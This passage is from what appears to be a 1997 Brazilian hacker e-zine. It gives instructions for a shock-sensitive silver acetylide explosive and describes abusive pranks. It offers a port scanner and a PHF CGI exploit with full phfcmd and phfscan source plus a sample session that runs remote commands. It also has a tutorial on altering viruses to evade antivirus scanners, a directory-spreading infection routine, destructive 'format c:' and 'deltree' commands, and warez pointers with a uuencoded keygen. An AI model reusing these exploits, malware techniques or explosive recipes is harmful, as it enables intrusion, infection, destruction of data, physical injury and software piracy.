---=+=-- NH NO ------> N O + H O + H 4 2 ^ 2 2 2 Aquecer Nitrito de amoneo EM FOGAREIRO ELETRICO (pois o gas que sai e' inflamavel!). OBS1: Na realidade o gas nao provoca o riso, mas sim uma contracao dos musculos da face. So' que um comeca a rir do "sorriso" do outro... OBS2: O gas do riso e' o N O (oxido de nitrogenio). 2 --=+=--- BOMBINHA DE NITRATO DE PRATA ---=+=-- Colocar em um becker nitrato de prata (AgNO ) em solucao aquosa (a concen- tracao nao e' importante). Em um kitassato colocar perdras de carbureto (carbeto de calcio) e fechar a boca com uma rolha de borracha. Jogue um pouco d'agua no carbureto e coloque um tubo cirurgico na sa!da lateral. A outra extremidade do tubo deve estar mergulhada no nitrato de prata. Espere parar de borbulhar e filtre o po que precipitou no becker. Cuidado pois esse po e' muito sensivel a choques e temperatura. Filtre-o apenas quando for usa-lo. --=+=--- FAGULHAS COLORIDAS ---=+=-- Misture os seguintes reagentes com polvora e coloque dentro de rojoes, fo- guetes de miniatura, etc.: VERMELHO: Qualquer sal metalico de estroncio, VERDE: Qualquer sal metalico de Bario, AMARELO: Qualquer sal metalico de Sodio, AZUL: Qualquer sal metalico de cobre, PRATA: Limalha de ferro, OBS FINAIS: Galera... nao vao pensa q sou tipo esses professorins bundinhas que ficam enxendo o saco com suas "reacoes quimicas" e tal... Nada disso, alias, nunca gostei de quimica, somente ultizo-a de acordo com os meus interesses! Outra coisa, devo agradcer tbm aos "peritos quimicos" que me ajudaram bastan- te... brigaduuuuuuuu! :) kS_5 - 1997(c) Global Domination Inc. >-===========================[chain]===================================-< 11.2-) ANARCHY-HUMOR ~~~~~~~~~~~~~ Como torturar seu irmao pentelho. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Voce esta no fim de DOOM II quando seu irmao esbarra o dedo no botao de reset. Voce nao tinha salvado o jogo , e vai ter de jogar mais 30 fases para chegar aonde estava. Ok, pelos instintos reflexivos , voce acerta um direto no rosto do muleque, que vai chorar para a mamae... Voce se refaz do acontecido , ja que seu irmao ganhou um olho roxo. Ai chega seu pai, que alem de te dar uma puta bronca, te obriga a instalar no micro uns joguinhos educativos que vieram no CD-ROM para seu irmao... Dar choque de 220 volts no muleque? Quebrar sua perna? Nao , isso e' para quem nao tem classe... Metodo 1: Gelol ^^^^^^^^^^^^^^^ Compre um vidrinho de gelol , aqueles de spray.Espere seu irmao sair do banheiro e mire na bunda dele.Aperte com vontade, para o jato atingir direto no cu. Nao vai adiantar ele tomar banho de novo , pois o rabo dele vai arder durante umas duas horas! Metodo 2: Pinguinho ^^^^^^^^^^^^^^^^^^^ Tortura chinesa pesada.Espera sua mae sair e amarre a anta.Leve-o para a cozinha e abra a torneira para que ela comece a pingar e deixe o coitado la' escutando aquele barulhim infernal da gota d'auga! Ele aguenta bem uma meia hora , mais que isso comecam os sintomas: olho vermelho, dor de cabeca e palidez. Em duas horas ele fica louco! OBS:Isso e' perigoso , seu irmao pode ficar paralitico mentalmente, e viver como um vegetal! Trote no panaca que passou no vestibular ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Material: -Uma barra de gelo -Azeitonas -Um copinho Coloque a barra de gelo numa cadeira e faca o panaca abaixar a calca. Ponha uma azeitona no meio da barra. O cara tem de pegar a azeitona fazendo "biquim" com o cu e coloca-la no copinho do chao! Se o cara nao conseguir , bata nele com uma touceira de capim... PS: jah fiz isso com um "bicho", e pode ter certeza q ri muito! :) by kS_5 & Van Dyke }-===============================[chain]===============================-{ 12-) RASTREANDO PORTAS... ~~~~~~~~~~ ~~~~~~~~~ E' a galera que ta pedindo, entao resolvi colocar nessa edicao uma fonte de um programinha que facilitara muito a vida de quem quer dar uma checa- da no sistema que pretende atacar. E' uma fonte simples, porem eficiente. Com ela voce vai checar todas as portas desde 1 ate 9999, sabe-se que al- gumas e' de conhecimento geral, como as de IRC ( 6665, 6666, 6667,...) as de MUD, a de sendmail e etc... corte aqui -----------------------IPCCK.C------------------------------- #include #include main() { int i; char ip[255],str2[255]; printf("Enter Host for port scanning:"); gets(ip); printf("\n"); for (i=1;i<9999;i++) { sprintf(str2,"telnet %s %d",ip,i); system(str2); } } corte aqui -----------------------IPCCK.C--------------------------------- AciDmuD - 1997(c) Global Domination Inc. - acidmud@thepentagon.com - }-===============================[chain]===============================-{ 13-) PHF exploit... ~~~ ~~~~~~~~~~ csh corporation presents.... Vou abordar esse infame bug, que, acredite voce ou nao, ainda existe muito... 1) O BUG: "O codigo resumido ao bug!" else { strcpy(commandstr, "/usr/local/bin/ph -m "); if (strlen(serverstr)) { strcat(commandstr, " -s "); /* RM 2/22/94 oops */ escape_shell_cmd(serverstr); ^^^^^^-> essa funcao somente pega codigos especiais e adiciona "\" pra que o sistema nao interprete "escapes codes" so que ele nao bloqueia o "\n" (%0A) strcat(commandstr, serverstr); strcat(commandstr, " "); } escape_shell_cmd(typestr); strcat(commandstr, typestr); if (atleastonereturn) { escape_shell_cmd(returnstr); strcat(commandstr, returnstr); } printf("%s%c", commandstr, LF); printf("
%c", LF);

        phfp = popen(commandstr,"r");
        
        bingo... como voces podem ver... ele simplesmente sai concatenando 
	strings e executa toda a meleca....

        send_fd(phfp, stdout);

        printf("
%c", LF); } 2) Explorando o BUG! Bom pra explorar o bug, eh muito facil... Olhando diretamente os fontes do programa, ele requer somente que um dos parametros seja passado para que ele resulte uma saida favoravel. csh:~/hack/phf-project$ telnet imbecil.com.br 80 Trying 127.0.0.1... Connected to imbecil.com.br. Escape character is '^]'. GET /cgi-bin/phf?Qalias=csh%0Aid

Query Results

/usr/local/bin/ph -m alias=csh id

	uid=65535(nobody) gid=65535(nogroup)
	
Connection closed by foreign host. csh:~/hack/phf-project$ BINGO!!! isso significa que o servidor esta sendo rodado pelo user nobody, grupo nobody.... pretty simple, huh? 3) Ferramentas de exploitacao: BOM, escolhi alguns utilitarios que sao muito utils no dia a dia do phf. Todos escritos por um amigo meu, o vandalz do #hack da efnet! :)) a) phfcmd : Para vc nao precisar usar telnet nem ter que decorar akele GET. Usage: phfcmd Exemplo: phfcmd localhost cat /etc/passwd b) phfscan: Scanear uma lista de hosts a procura de PHFs... Usage: phfscan Exemplo: phfscan arquivo.com.todos.os.COM.BR -------8<------8<-- phfcmd.c --8<------8<----- /* PHf COMMAND ][ ***** Executes remote comands in phf apache hole!! Coded by: Vandalz Greetz: Life Suckz! This is pretty simple.. Compile, port it if your system ... if you know how to do that, you're not intended to use this... */ #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif int TIMEOUT = 1; void sig_handler( int signo) { TIMEOUT = 0; } main (int argc, char *argv[]) { char host[100], buffer[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char PHFMessage[]="GET /cgi-bin/phf?Qalias=x%0A"; outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname ( argv[ 1]); strcpy( buffer, PHFMessage); for ( c=2; ch_addr_list[0], sizeof (outgoing.s_addr)); strcpy ( host, inet_ntoa ( outgoing)); serv_addr.sin_addr.s_addr = inet_addr ( host); serv_addr.sin_port = htons (80); /* Timeout on server */ signal( SIGALRM, sig_handler); TIMEOUT = 1; alarm(10); X=connect ( outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if ( TIMEOUT && !X) { write( outsocket, buffer, strlen( buffer)*sizeof( char)); while((X=read(outsocket,buffer,8096))!=0) write( 1, buffer, X); close ( outsocket); } return 0; } -------8<------8<-- phfcmd.c --8<------8<----- -------8<------8<-- phfscan.c --8<------8<----- /* PHf SCAN ][ ***** Scans to find phf apache hole!! Coded by: Vandalz Greetz: Life Suckz! This is pretty simple.. Compile, port it if your system ... if you know how to do that, you're not intended to use this... */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif #define HTTPD_PORT 80 int timeout = 0; int sig_handler( signo) int signo; { timeout = 1; } /* some routines I made long time ago... but still useful!! ;) */ /* socket reading writing stuffs... */ /* pretty simple!!! */ /* (p)vandalz, 1996 */ #define SOC_BUFF_SIZE 2048 char soc_buff[ SOC_BUFF_SIZE]; char *soc_ptr; int soc_len=0; int soc_readln( soc, str) int soc; char *str; { char b; /* reads a new buffer */ if ((soc_len==0)||(soc_ptr>=soc_buff+soc_len)) { soc_len = read( soc, soc_buff, SOC_BUFF_SIZE); soc_ptr = soc_buff; if (soc_len == 0) { *str = 0; return -2; } #ifdef DEBUG fprintf( stderr, "read %d from socket.\n", soc_len); fflush( stderr); #endif } while (1) { b = *(soc_ptr++); if (b == '\n') break; *(str++) = b; /* reads another buffer from socket */ if (soc_ptr>=soc_buff+soc_len) { soc_len = read( soc, soc_buff, SOC_BUFF_SIZE); soc_ptr = soc_buff; if (soc_len == 0) { *str=0; return -2; } #ifdef DEBUG fprintf( stderr, "read %d from socket.\n", soc_len); fflush( stderr); #endif } } *str = 0; } soc_writeln( soc, str) int soc; char *str; { write( soc, str, strlen( str)); } /* (p)vandalz, 1996 -- socket_writeln, socket_readln, bufferized */ int checkphf( soc) int soc; { char phfMSG[]="GET /cgi-bin/phf?Qalias=die%0Aid\n"; char tmp [256]; int ok=0; soc_writeln( soc, phfMSG); tmp[ 0]=1; while ((tmp[0]!=0)&&(!strstr( tmp, "Query"))) { soc_readln( soc, tmp); #ifdef DEBUG fprintf( stderr, "<==[%s]\n", tmp); #endif } if (!strstr(tmp, "Query")) { printf("no phf found!\n"); return -1; } while( tmp[0]!=0) { soc_readln( soc, tmp); #ifdef DEBUG fprintf(stderr,"<==[%s]\n", tmp); #endif if (strstr( tmp,"uid")) { printf("PHF (%s)\n", tmp); ok = 1; } } if (!ok) printf("PHF found, but cant exploit it!\n"); return 0; } main( argc, argv) int argc; char *argv[]; { struct sockaddr_in server; struct hostent *hp, *gethostbyname(); char hosts[ 1024]; int phfsoc; FILE *sl; if (argc<2) { printf("usage: %s \n", argv[0]); exit( -1); } sl = fopen( argv[1], "rt"); if (!sl) { printf("could open site list file!!\n"); exit( -1); } while( !feof( sl)) { hosts[ 0]=0; fgets( hosts, 1024, sl); if (hosts[ 0]) { phfsoc = socket( AF_INET, SOCK_STREAM, 0); soc_len = 0; server.sin_family = AF_INET; hosts[ strlen( hosts)-1] = 0; hp = gethostbyname( hosts); printf("%s ", hosts); if (hp) { bcopy( (char *)hp->h_addr, (char *)&server.sin_addr, hp->h_length); server.sin_port = htons( HTTPD_PORT); timeout = 0; signal( SIGALRM, sig_handler); alarm( 10); /* ten seconds time out!! */ if (connect( phfsoc, (struct sockaddr *)&server, sizeof( server))==0) { /* we are connected at the server!! */ /* Do what we should do!! */ alarm( 0); checkphf( phfsoc); fflush( stdout); } else { alarm( 0); if (timeout) printf( "timed out!\n"); else printf("conection refused\n"); } } else printf("no such host!\n"); } close( phfsoc); } } -------8<------8<-- phfscan.c --8<------8<----- Mais uma producao de csh, hackeando para um mundo melhor! }-===============================[chain]===============================-{ 14-) VIRII - Mutacao Virotica Simples & Pesquisa de Diretorios ~~~~~ ~ ~~~~~~~ ~~~~~~~~ ~~~~~~~ ~ ~~~~~~~~ ~~ ~~~~~~~~~~ Oi, sou o Worm_root, ou Spider, p/ os q me conhecem, eu sou o editor da Cyber-Demons, e membro do VBB(Virus Bit & Bytes) e agora, eu tambem faco parte desse grupo(eu acho ;)...eu fiquei encarregado de escrever a parte sobre virus... espero q gostem e divirtam-se... Se o Acid deixar, de vez em quando eu escrevo outras coisas tambem... :) P.s.: Facam o q quiserem com as informacoes aqui contidas, de preferencia, se for um virus, nao o distribua sem antes entender o codigo, isso eh lamer... se nao entendeu... aprenda, ou -> echo y|format c: P.s.2:Se vc usa o Virus Generator, ou qualquer uma dessas merdas de cri- acao de virus, aki vai um conselho: deltree /y c:\*.* >null Mutacao virotica simples: ~~~~~~~ ~~~~~~~~ ~~~~~~~~ He he he... curtirao o nome?? Bem, ao contrario do titulo a coisa eh sim- ples, trata-se de como pegar um virus ja existente e criar um outro, uma VARIANTE. Porq? Qual a utilidade? Sei la!! Bem.. quero dizer... existem algumas utilidades... ao inves de criar um codigo totalmente novo, vc simplesmente modifica um ja existente e produz um melhor. Mesmo porq, criar um virus inteiro cansa, enche o saco, e muitas vezes vc vai testa- lo, e vai ver q seu anti-virus o detecta e o acusa como sendo um virus ja existente. Vc vai pensar "###&*riu!! Eu criei um virus inteiro e esse merda de anti- virus me diz q ele ja existe?!? Porq?" simples, porq os virus ja estao es- tagnados... o ambiente MS-DOS eh muito aberto, milhares de pessoas fizeram virus p/ eles, entao, fica dificil vc conseguir criar algo realmente novo... Vamos comecar: Talvez muitos de vcs possuem em seus computadores, algum tipo de codigo de virus famoso, como por exemplo o Trojector. Talvez tambem, algum dia vc decida dar vida ao dito cujo, mas percebe que qualquer anti-virus merrequinha pode detecta-lo, o que vc faz? Chorar(vc eh viado)? Nao, vc le nossa revista, Ha ha ha... Ta legal, vamos voltar ao papo serio, neste artigo, vc aprendera como TEORI- CAMENTE vc pode fazer um virus ja conhecido se tornar novamente nao detecta- vel. Teoricamente, porque as vezes esse tipo de coisas torna-se tao macante que e mais facil criar um novo virus. Se vc ja "pegou" a coisa, vc deve ter compreeendido, que dessa forma vc ira gerar o que nos chamamos de variante, isto eh,se vc alterou o Trojector(que e muito comum) de forma que ele fique novamente indetectavel, vc com certeza criou uma das trilhares de variantes desse virus! Vamos a parte tecnica ---> Para fazer isso vc precisa de algumas ferramentas especiais: * Norton Utilites (ou qualquer outro bom editor hexadecimal). * Debug (nao e necessario, mas facilita). * Turbo Debugger da Borland. 1-) Crie um arquivo bite com o Debug. Arquivos bite, sao arquivos usados por pesquizadores de AV(anti-virus), para fazer os virus contaminarem estes ar- quivos, que depois serao usados para estudar o virus. Por exemplo, suponha que vc fez um arquivo bite que possui uma unica instrucao: INT 20H E claro que se vc contaminar esse arquivo com um virus, tudo, MENOS O 'INT 20H' formam o virus original! Note que alguns virus nao contaminam arquivos bite(isso ja foi discutido anteriormente). Para fazer um arquivo bite, use o Debug ou seu compilador assembler, os co- mandos abaixo podem ser digitados diretamente no debug, mas eu aconselho que vc digite tudo abaixo do tracejado e depois use o debug para "compilar" esse arquivo, dessa forma vc elimina qualquer erro de digitacao. Ok, crie um arqui- vo chamado BITE1.SCR e nele digite as seguintes linhas: n BITE1.com ; Criar um arquivo chamado Bite1.com. a ; Entrar no modo assembler. int 20 ; Instrucao do programa, apenas termina o programa. rcx ; Especificar o tamanho do arquivo. 2 ; Tamanho do arquivo. w ; Grava. q ; Sai. ; ANTES DE CRIAR O ARQUIVO RETIRE TODOS OS COMENTARIOS ; ACIMA!! Depois use o Debug para transformar esse arquivo em uma executavel, digite: DEBUG < BITE1.SCR Isso criar um arquivo de 2 bytes chamado BITE1.COM. Os comentarios e os ';' devem ser retirados antes de se criar o arquivo!!! Se vc quiser digitar o nome do arquivo, tudo o que ocorrera eh o termino do arquivo, visto que a unica instrucao de nosso arquivo e uma "int 20h"->para terminar a execucao de um programa. 2-) Contamine o arquivo com o virus. Se for um virus de BOOT, de um jeito, mas vc tem que contaminar esse arquivo de 2 bytes, do contrario, pode es- quecer... CUIDADO PARA NAO CONTAMINAR O SEU HD! Faca a coisa em um disquete! Nao se esqueca de manter uma copia do Bite1 original(sem o virus!!). Se for um virus de arquivos Exe, de um jeito de converter seu arquivo BITE1. COM para BITE1.EXE, NAO BASTA RENOMEA-LO, vc tem de criar um Exe. 3-) Carregue DISKEDIT, que vem com Norton 6.0 (que eu nao tenho.. :-( ) ou o editor hexadecimal do PCTOOLS ou ainda o Hiew(eu gosto muito pois ele e muito facil de usar). Em sua tela vc tera entao o codigo hexadecimal do arquivo infectado. Agora, ache atraves do editor hex., o meio do arquivo, se ele tem 14k, se dirija para o ultimo byte, antes de formar 7k. Preencha os 7k em diante com besteira, como por exemplo 255d (FFh) o caractere de espaco. Agora, execute o SCAN, se o SCAN detectar o virus, e porque a sequencia da assi- natura esta entre 1b e 7k, do contrario, a sequencia esta entre 7 e 14k, simples hein? Dessa forma, basta vc ir "picando" o arquivo que logo logo vc achara a assinatura. E por isso que antes de alterar os arquivos, e bom vc ter copias reservas do BITE1.COM limpo(s/ virus) e do contaminado. Salve e volte para o Dos. Use o SCAN para procurar pelo virus, nos usamos o SCAN pois ele apenas pro- cura por assinaturas, e e' isso que nos estamos tentando modificar. Se o SCAN encontrar o virus, e porque vc ainda nao deletou a string pela qual o virus e identificado. Entendeu ? PELO AMOR DE DEUS, TENHA EM MENTE QUE A VERSAO DO SCAN QUE VC IRA USAR, DEVE ENCONTRAR O CODIGO DO VIRUS QUE VC ESTA TENTANDO ALTERAR, ISTO E, O QUE ADIANTA VC ALTERAR O CODIGO DE VIRUS SE O SEU ANTI-VIRUS NAO E CAPAZ DE LOCA- LIZA-LO ?!? DESSE JEITO VC NUNCA IRA SABER SE FUNCIONOU POIS O SCAN NUNCA VAI ENCONTRAR SEU VIRUS NEM O ORIGINAL (O QUE VC ESTA MODIFICANDO). Por exemplo, quando procura pelo virus Cascata, o SCAN procura por algo pare- cido como: EB1DAD1273D1FF121F (Eu achei isso numa revista) Entao meu caro, vc esta tentando apenas alterar a string que o SCAN usa para detectar seu virus. Tudo o que vc tem a fazer e ir deletando partes do virus ate que o SCAN nao detecte mais o seu virus alterado. E claro que deletando partes do virus, ele nao ira funcionar(pois o arquivo estara com pau), mas nos nao estamos querendo ele funcionando, nos estamos apenas querendo saber que parte do virus e detectada pelo SCAN(por enquanto, he, he, he...) Em 75% dos virus, a assinatura(os bytes identificaveis pelo SCAN) esta nos primeiros 150 bytes do arquivo. Ok, supunhetemos que vc tenha achado a assinatura, e ela seja algo como: B8 92 19 B7 21 CD As assinaturas sao mais compridas, isso e apenas um exemplo... Volte ao debug, e digite: DEBUG E 0100 b8 92 19 b7 21 cd ; Isso e a string achada. U ; Isso ira converter a string achada para o seu ; codigo assembler original, nesse exemplo, essa ; string eh: mov ax,1992h mov bx,21h int 21h VC TEM QUE PELO MENOS TER UMA NOCAO DE ASSEMBLER PARA SABER COMO FAZER ESSE TIPO DE COISA. Use o Turbo Debugger ou o Debug para fazer a seguinte coisa: Isso e o que vc tem na tela: mov ax,1992h mov bh,21h int 21h Agora, tente mudar a ordem dos comandos para por exemplo: mov bh,21h mov ax,1992h int 21h A 'INT 21H' TEM SEMPRE DE FICAR NA ULTIMA LINHA! ISSO EH OBVIO. Agora, provavelmente o SCAN nao mais ira achar o virus!! FACIL!?!?!!! You see? You didn't change the way the code functions (THATS IF YOU KNOW WHAT YOUR DOING!) but you changed the codes id-string for SCAN. Como o Turbo Debugger nao permite salvar as mudancas, use o Debug para is- so, entao digite: DEBUG BITE1.com ; Arquivo com o virus. a 0122 ; Endereco de onde esta a string achada. Entao entre com as instrucoes: mov bh,21 mov ax,1992h int 21h w ; Grava. q ; Sai. Scaneie o arquivo, se o SCAN nao achou, entao vc conseguiu, caso ele en- contre, tente alterar essas instrucoes por outros comandos mas de forma a produzir o mesmo resultado. OBS.: Isso so funciona para virus nao encriptados, ou em seus mecanismos de encriptacao(que na maioria das vezes sao scaneados pelos AVs). Caso vc tenha o codigo do fonte do virus, a coisa fica bem mais facil, vc o modifica, compila, e depois roda o SCAN, e modifica algumas partes do co- digo ate ele voltar a ser indetectavel. Pesquisa de diretorios: ~~~~~~~~ ~~ ~~~~~~~~~~~ Infelizmente, eu to mto ocupado, por isso nao tive tempo de achar nenhum codigo p/ a revista... por isso, p/ os q ja manjam da criacao de virus, eu vou mostrar uma pequena rotina, desenvolvida por mim, com o proposito de realizar busca por diretorios. A coisa funciona assim, ao inves do seu vi- rus simplesmente descer um diretorio('..'), ou ir p/ o raiz, ele ira pro- curar por mais diretorios onde possa entrar e contaminar... Com esse sis- tema, mesmo q o virus fique apenas no raiz C:\ , ele acabar infectando o sistema todo, o q nao ocorre com muitos virus existentes por ai... O codigo ta pode ser melhorado, mas demorou-me 1 semana de pesquisas.. :( Inicio: call GET_DTA ; Seta novo DTA push dx ; Salva mov ah,1AH ; Seta DTA int 21H mov ah, 04eh ; Funcao procurar pela 1. ocorrencia de arquivo mov cx, 00010001b ; "Atributo" dos diretorios :) lea dx, maske_dir ; Mascara p/ diretorio int 21h ; jc Erro ; Erro, aborte pop bx ; Get pointer to search table (DTA) test BYTE PTR [bx+15H], 00010001b ; Eh um diretorio ? jz Find_next ; Nao, ache outro cmp BYTE PTR [bx+1EH],'.' ; Eh um padrao('.' e '..')?? jne Real ; Nao, eh um diretorio real! GET_DTA: ; mov dx,OFFSET DTA2 ; mov al,2BH ; add dx,ax ; Return with dx= proper dta offset ret ; DTA2 db 56H dup (?) ;dta for directory finds (2 deep) maske_dir db "*",00 ; search dir's A rotina por si so eh muito simples, notem q vcs terao de "encaixa-la" no seu virus.. isso eh apenas a funcao de demonstracao... Essa funcao a- penas procura por diretorios, mas tenho certeza q c vc a entendeu, nao tera dificuldade em fazer o virus ascessar o diretorio achado.. so se lembre de antes salvar o diretorio original p/ q depois o virus possa voltar sem ser detectado. Na proxima edicao, um guia simples sobre como escrever seus primeiros vi- rus .COM e .EXE Spider/Worm_root P.s.: A materia sobre modificacao de virus foi tirada da minha revista, a Cyber-Demons numero 1. A numero 2, foi resultado de pesquisas minhas... }-===============================[chain]===============================-{ 15-) WAReZ ZONe ~~~~~ ~~~~ ---------------------------------------------- - MnEuMoNiC's Overview About Warez & Related - ---------------------------------------------- Knowledge is Never a Crime. [ 2600 Magazine ] Bem, comeco escrevendo para o Zine AXUR05 declarando que nao sou uma autoridade no assunto (como a maioria de nos nao pode negar) e tenho MUITO a aprender. Apenas tenha em mente que os conhecimentos que coloco `a disposicao neste artigo sao somente com propositos educacionais e que todos os prejuizos que qualquer pessoa venha a sofrer, baseando-se ou nao neste artigo, sao de inteira e completa responsabilidade dele mesmo. Aqui pretendo apresentar informacoes iniciais de como conseguir informa- coes sobre os falados `Warez' ou como conhecemos no Brasil, -pirataria-. Mas voce pode estar se perguntando PORQUE publicar um artigo como este se a pirataria e' ilegal? E' este o meu objetivo aqui: mostrar o lado bom e o mau do Warezing. Voce realmente compraria um software especifico com alto preco sem co- nhece-lo? Ou voce buscaria alguem que ja' o possui, pediria informacoes e, talvez se gostasse, o compraria? Esta segunda opcao e' realmente a recomen- dada... Mas porque que quando buscamos um programa, somos OBRIGADOS a com- pra-lo, testa-lo, e se nao gostarmos, tentar vender (acho dificil alguem querer comprar pelo mesmo preco...). Nao seria justo da parte das empresas a liberacao de seus softwares, para fins de testes, antes da compra propri- amente dita? Ja' que o mercado nao assimilou tal ideia, e' para isto que existem os Wa- rez Groups (grupos expecializados em distribuicao dos Warez), Warez Boards, Couriers e os News Groups relacionados a Warez. Sao os Warez Groups (como PWA, RiSC, DoD, etc...) que 'captam' os warez e distribuem atraves de sitez ftp com ajuda dos Warez Boards (existem MI- LHARES deles em todo o cyberspace!) e atraves dos Couriers que distribuem no iRC ou em seus BBSs. Mas sao nos News Groups onde encontramos a maior quantidade de informacao reunida, e e' por isso que coloco abaixo a lis- ta dos grupos de discussao mais famosos na area... alt.binaries.warez.ibm-pc alt.binaries.warez.ibm-pc.old alt.binaries.warez.ibm-pc.d (d = discussion) alt.warez.ibm-pc.apps alt.warez.ibm-pc.games alt.warez.ibm-pc.old alt.cracks alt.crackers Note que nem todos os repositorios de news possuem estes grupos, ou seja, procure os sites de acesso free e que possuam estes grupos. Se o seu pro- vedor em servico de news com estes grupos, sorte sua! Senao, use este aqui que e' free, mas MUITO lento (ta' achando que vou te dar um servidor de news free e rapido, e'?) - [ wisipc.weizmann.ac.il ] Para a leitura e postagem dos mails em News Groups, recomendo o Forte Free Agent V1.0 ( http://www.forteinc.com/forte ). Agora e' so' ralar, ler muito e dar uma pesquisada tambem nos canais #wa- rez, #warezwarez, #warez666 e outros relacionados na EFNet, DALNet e ou- tras tantas redes de iRC pelo mundo. Nao se esqueca que NADA e' de graca e ninguem vai te dar nada em troca... Nothing is free, ok? De presente, uuencoded ai' em baixo, o Key Generator do Free Agent, ok? ---------------------------------------------------------------------------- section 1 of uuencode 5.21 of file fagentkg.zip begin 644 fagentkg.zip M4$L#!!0``@`(`!RN.R+";G&%LP$``-D#```+````1DE,15])1"Y$25JMDK%N MVS`0AGH<_:P"3[9JIAA*[::O60('NM,/$0FVI$&@;>2Z/[9BA'?($),4G M*#*+@Y`CY=0:4K1##B)QO/OOXT]`:?+K?C1JO0>%A_?M:'1W1]^_(JCB7#\9 MY^Z_I\F>3BTL##RCM*$$QA@PF!;&#GN'B)(N9,;X8(*1/%+W/T.>)TN"T.:]TCC(E[K#SU:+'F*+'1M(UN3$>W_L$Y1\B.[@@9 M/0LA/>S''LB"ZPZ24/"]+`K=X+'/QEL^XV/^A><\XY?\G$XG_`.?\$_\Y&\C MA/OY@C_*#W+GD9<7F_SW0Y'A?R*JJX]%]B:[G8OQ5JP*,5_)YU'35347*YQ7ZZ(4JJA*7)8+AERN"1QQ+_S8-)E4M9*8 MU%)B?"-+A>UK]@JGP>Q4EK(6JJI/TV0J%=12XO-2U')'"T*=I5M:,7&5HV=8&64AB2KJ? MBFSF4V5/!F'F0$5-N;]S=;_U^^-W>;T.G',^W^_W?;_?<[ZL7%N#8```"FAE M$$0Q``@`H\#PLW(M0!;&Q402Q&I2@'3"?5>@!KD4,.,)0UY[&VAD#5P%T#BQ M`%=!T;!SF4#Z1Q&U[I7COK%59N3B;+B(LIE@\,!KP!*\8R_=@]+J;! M]0.VB_@C89LK5P*G152CA8MXT37K$]?]+5WE7!;BK+FW$R.%%<*74`CG4&CB M(I@+*>1H_Y$:S`8S20'E>#`>2H$D6E]D@K"<^O3-L!+\SS-D)6M(H<$M%0*J M9,TDHL3KE4SFV2Z3^';(\%JX``!U(BBK%KIC^00\_3J/F6UUD!SSD]P MJN<9VTP8,I_X.'4"H]->7\R[:;J*X'KA712U!]F3J0?*X6FY:%&1H(\`0YL6 M9=Y`"$(@9.H4%1#PO3A:OAQFA4MX40J$99C,*&^6Z^8C((U>@86H`;!$DZ\$ M\!H-$'`(O^H!@SD%N6C+,V\D2`$%6&A9PTKH;M@QA:/UZTT=O\;KG6?2(8T[ MK)/5RAOZY;`*.*S"6X(;HHXCCX0@9($:24,Y6AVF`MY\+YC^_]H[E"19G;SI MEE4F\;0JT5J)9Y=RN<2S1\G09CB1]4`&:#KW^Y6X/K=7B=<: M7TD\>Y6W",+XU%[W8:DN"]?&X&RK,HC=HTSAXHE`>(\B@7/<@E<:GS&\>I5^ M>GNC\;6$W:L4FEGV1@FSGS27ZHU/<1WI8IV.'Q6I`F"7DZ-,RH,5#"7N6&5Q MAYZG4E=^QP-K$^(LEZ-61YIF$&OC$V#&G0GF@#*-&F^N=A@KI9Y6F;&4P*Q* MP5VZ96I6+`[I.D+;46\C.MBN235@V_YF2"EJB#`]XI,-.E]0$]60;84_9.%]8CPC8'[L_H MV>\^M/+^NY6,%M*2](*7VQL2=?\P,"%!0,]0^"*ZY=>HU:8$!_E"&0_CS:@# M7C",O.U4!5M$7B1_$7F1`D0R>,UR_46F'8X@C"U*1G/AMKYDM@@-88O\>O$W M`P%:6SZ<(QG:A^98W>">//*=Y=^%`Q&9XG5H5)^"HGP%=YP))L(*`0YCZ5Q%&- M`*:G@T%8J!CB0+F^Y*@$#0D50QS[,,Y129`CA5L<)C%M-+64$UP8^Z@$`H:*3?3_`WA!2@)> ME)+Y^4E*`I7H96HW,,#1VJ[B7+C1@;*A2*N<[P:2X>7!&PS/"+%>%M2=W)X+ MO[`+TM0QG#I-I4SM"O"F`F,K6AMD3!G!J$MU@OFR+%ZVS\RH2^LBN!>DJLM2 M2')1RC2=)5%PN.3'U$!EFKNH#.\5E:&$H+I7<@PX!&TTO%^HHPA+J5%K#":^Z0(1-Q((UB<( M*RBF$X3N[_\*3.%-)?,RB4HV8!_J4+D(HL2;H@8(;*=XB`\U`F=[4Z7C>HP! MA.$97B$6>U,,+R6'`3"\B4A_J?&FW((^0B91LPH8VMTL>*ZND@G$Q0"VNW1; MD#7Y)=E>7%Q!=8X/*+$_:FY>>[,@OWR@ON?&%6-AX9[HR-K3,0>^G)L08\A] M<#^?6=^1V+SP;,N_$^I:;&TR#S7*+#/-^VI74UIB^[S?QD]KO%>T?G<'HZ,I_^&8 MO.^U;C57:RY3O'^(/?^1RW>\OEFEF0OW#U1G;AY0548$1TYJ3J\Z&ZG.T4_V M"4Z/\WUA>1M@7B)IK#FV_/0?4R]VICT*,(R(/IT:N:MC7/6I\=PS=,D'I^<\ M#I^W7U+3V7WUDH"8L]Z]=8YS8V7?LARK1V'8R<:#\^?FO,IMN3*Y8_.DSQ>= MIFO.V_]Z1MO].-S\[9.W=RZX2AOLLF]T'U.,>=B*C5DT^A)#8]>//V1O'OU^ MMUG)_)G3BIO<7OX9,CTS:T/@J5$>GUXYY2]&N"LJ M\DY.'7UDR_;I8''%U+"]$>%/NF_&C/21JP+9!;,0+C_<4GG<96_A&>-)R>G" MCKMNX_;UOS MC5D=]3GL+\:URO?GL6?.J-_$BO2=55_E?&U_(81K1=*&8*%.GW&XH,7OL*R'WLM M?K0)CP[/\NA^/[XL*?I,@<^\55/9OZ,Y5:;*[UU^OO--+)=BBWO_-_;NGE0T=3#-\N7+(\REQ7<*;N:IK[BU9OXUZVF)(?M),<&^ M=J]ZZQ5T[&?,096C_%4D*BW]UV]W%]V?YI&K*YHS;90+=N+W+1LFLT:&GIB; M^.WF'7=+KE^_!#Q+;1;B;9;,UO?TJ+5@?GRW*#@_JWG"AYN2`L(P:917CPG5:XGSS[DU1\\LW7CW&UX]X.F?&V2;T+YE"GZ,[\ZW_![[M+< 